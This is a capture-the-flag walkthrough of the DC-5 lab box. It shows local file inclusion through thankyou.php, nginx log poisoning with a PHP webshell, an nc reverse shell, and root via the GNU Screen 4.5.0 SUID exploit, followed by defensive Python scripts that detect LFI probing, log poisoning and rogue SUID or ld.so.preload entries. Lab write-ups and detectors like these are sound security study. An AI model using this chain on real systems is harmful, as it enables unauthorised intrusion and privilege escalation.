Lab environment
Kali 2020: IP 172.25.0.69
DC5: MAC 00:0c:29:b2:15:58
0x01 Host discovery
Matching the known MAC address in the netdiscover output gives the DC5 IP as 172.25.0.67
```
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 4 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 4 240 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 1 60 VMware, Inc.
172.25.0.67 00:0c:29:b2:15:58 1 60 VMware, Inc.
172.25.0.100 00:50:56:f7:88:92 1 60 VMware, Inc.
```
0x02 Port scanning
```
kali@kali:~$ sudo nmap -A -p- 172.25.0.67
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 05:46 EST
Nmap scan report for 172.25.0.67
Host is up (0.00047s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33509/tcp6 status
| 100024 1 35146/udp status
| 100024 1 45526/tcp status
|_ 100024 1 47967/udp6 status
45526/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:B2:15:58 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 172.25.0.67
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds
```
0x03 Vulnerability discovery and exploitation
Starting directly with the web application.
The contact form submits its fields to the backend via GET, so that area was tested for SQL injection and other issues. Comparing responses in Burp showed no change in either response length or content, so SQLi was dropped. However, the copyright text in the page footer varied between responses, which suggested that thankyou.php might have a file inclusion vulnerability.
Why suspect file inclusion?
In ordinary website development, content that repeats across pages (such as a footer) is pulled in with an include, so a page whose footer changes is a natural candidate for an include driven by user input.
Brute-forcing filenames under the web root (the screenshot for this step is missing).
0x04 Fuzzing
Fuzzing confirmed that a file inclusion vulnerability exists,
and that the include parameter of thankyou.php is named file.
![](https://img.haomeiwen.com/i11783675/4e8f328c71f7c212.png)
Brute-forcing log file paths with Burp located the nginx log at /var/log/nginx/access.log
![](https://img.haomeiwen.com/i11783675/2bf3877b5c36a350.png)
A PHP one-line webshell is written into the log file (log poisoning)
![](https://img.haomeiwen.com/i11783675/cf8246d0bec61aba.png)
Connect with AntSword (中国蚁剑) to the poisoned log through the include:
http://172.25.0.67/thankyou.php?file=/var/log/nginx/access.log
![](https://img.haomeiwen.com/i11783675/b18c5588cf5871d6.png)
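The two steps above (probing the `file` parameter of thankyou.php, then planting PHP in /var/log/nginx/access.log) leave a recognisable trace in that same log. The following is an added detection example, not code from the original write-up: it parses nginx combined-format lines and flags both LFI probing and PHP tags landing in logged fields. The sample log lines are constructed; only the parameter name `file` and the log path come from the write-up.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed nginx combined-format sample (not captured from the box). The last
# line shows PHP code arriving in the User-Agent, which is how access.log gets poisoned.
SAMPLE_LOG = """\
172.25.0.69 - - [25/Feb/2020:05:50:01 -0500] "GET /thankyou.php?firstname=a&subject=hi HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
172.25.0.69 - - [25/Feb/2020:05:51:12 -0500] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
172.25.0.69 - - [25/Feb/2020:05:52:33 -0500] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
172.25.0.69 - - [25/Feb/2020:05:53:45 -0500] "GET /thankyou.php?file=../../../../var/log/nginx/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
172.25.0.69 - - [25/Feb/2020:05:54:02 -0500] "GET / HTTP/1.1" 200 512 "-" "<?php echo 'poisoned'; ?>"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
WRAPPER = re.compile(r"^(php|data|expect|phar|zip)://", re.I)


def suspicious_include(value):
    """True when an include parameter points outside the intended set of page fragments."""
    return value.startswith("/") or ".." in value or bool(WRAPPER.match(value))


def analyze(log_text):
    """Return (line_no, finding, detail) tuples for LFI probes and log-poisoning attempts."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        # Poisoning: PHP tags in any field nginx copies verbatim into access.log
        for field in ("target", "referer", "ua"):
            if PHP_TAG.search(unquote(m.group(field))):
                findings.append((n, "php_in_request", field))
                break
        # Probing: the include parameter (named `file` on this box) leaving the web root
        query = parse_qs(urlparse(m.group("target")).query)
        for value in query.get("file", []):
            if suspicious_include(value):
                findings.append((n, "lfi_attempt", value))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

Run it against a real access.log by passing the file contents to `analyze()`; a `php_in_request` hit on a host whose pages include user-controlled paths is the signal to treat the log file as already executable content.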
Reverse shell with nc
![](https://img.haomeiwen.com/i11783675/609514f948ad6356.png)
```
kali@kali:~$ nc -lvvp 1234
listening on [any] 1234 ...
172.25.0.67: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.67] 33530
python -c 'import pty;pty.spawn("/bin/bash")'
```
0x05 SUID privilege escalation
List the SUID binaries the www-data user can run
```
www-data@dc-5:~/html$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
```
Searching for screen 4.5.0 shows a known local privilege escalation vulnerability.
The exploit was downloaded and uploaded to DC5 via AntSword into /tmp, which is writable.
```
kali@kali:~$ sudo searchsploit screen 4.5.0
[sudo] password for kali:
---------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------- ----------------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41152.txt
GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41154.sh
---------------------------------------------- ----------------------------------------
Shellcodes: No Result
kali@kali:~$ searchsploit -m 41154
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/41154.sh
```
The exploit shell script may not run as-is; splitting it into its separate steps and running them one at a time is recommended. The splitting is not covered in detail here.
The exploit succeeded in escalating to root, and the flag was obtained
```
www-data@dc-5:/tmp$ ls
ls
libhax.c libhax.so rootshell rootshell.c toroot.sh
www-data@dc-5:/tmp$ chmod +x toroot.sh
chmod +x toroot.sh
www-data@dc-5:/tmp$ ./toroot.sh
./toroot.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
# whoami
whoami
root
# /bin/bash
/bin/bash
root@dc-5:/etc# cd /root
cd /root
root@dc-5:/root# ls
ls
thisistheflag.txt
root@dc-5:/root# cat thisistheflag.txt
cat thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
root@dc-5:/root#
```
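The escalation path above has two host-side fingerprints: an SUID binary that does not belong to the base install (the versioned /bin/screen-4.5.0), and a /etc/ld.so.preload file that points at a library under /tmp. The following audit script is an added example, not code from the write-up or the exploit: it reproduces the `find / -perm -4000` inventory in Python, diffs it against an assumed baseline, and rates any ld.so.preload entries. The baseline set is illustrative rather than authoritative for a given distribution; the SUID list is the one printed on this box.

```python
import os
import stat

# SUID inventory as printed by `find / -perm -4000` on this box, reused here as input.
SUID_FOUND = """
/bin/su /bin/mount /bin/umount /bin/screen-4.5.0 /usr/bin/gpasswd /usr/bin/procmail
/usr/bin/at /usr/bin/passwd /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh
/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device /usr/sbin/exim4 /sbin/mount.nfs
""".split()

# Assumed baseline: SUID binaries a stock Debian-style install is expected to ship (illustrative).
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/gpasswd", "/usr/bin/procmail",
    "/usr/bin/at", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/chsh",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/sbin/exim4", "/sbin/mount.nfs",
}


def scan_suid(root="/"):
    """Walk the filesystem and return regular files with the setuid bit (like find -perm -4000)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def unexpected_suid(found, baseline=EXPECTED_SUID):
    """SUID binaries not in the baseline; a versioned name such as screen-4.5.0 stands out immediately."""
    return sorted(set(found) - set(baseline))


def check_ld_preload(content):
    """Rate /etc/ld.so.preload entries: the file is normally absent, so every entry deserves review,
    and a library under a world-writable directory (what this box's exploit leaves behind) is high."""
    findings = []
    for lib in content.split():
        risky = lib.startswith(("/tmp/", "/dev/shm/", "/var/tmp/"))
        findings.append((lib, "high" if risky else "review"))
    return findings


if __name__ == "__main__":
    print("unexpected SUID binaries:", unexpected_suid(SUID_FOUND))
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as fh:
            print("ld.so.preload entries:", check_ld_preload(fh.read()))
```

On a live host replace `SUID_FOUND` with `scan_suid()`; the same two checks are cheap enough to run from a cron job and compare against the previous run.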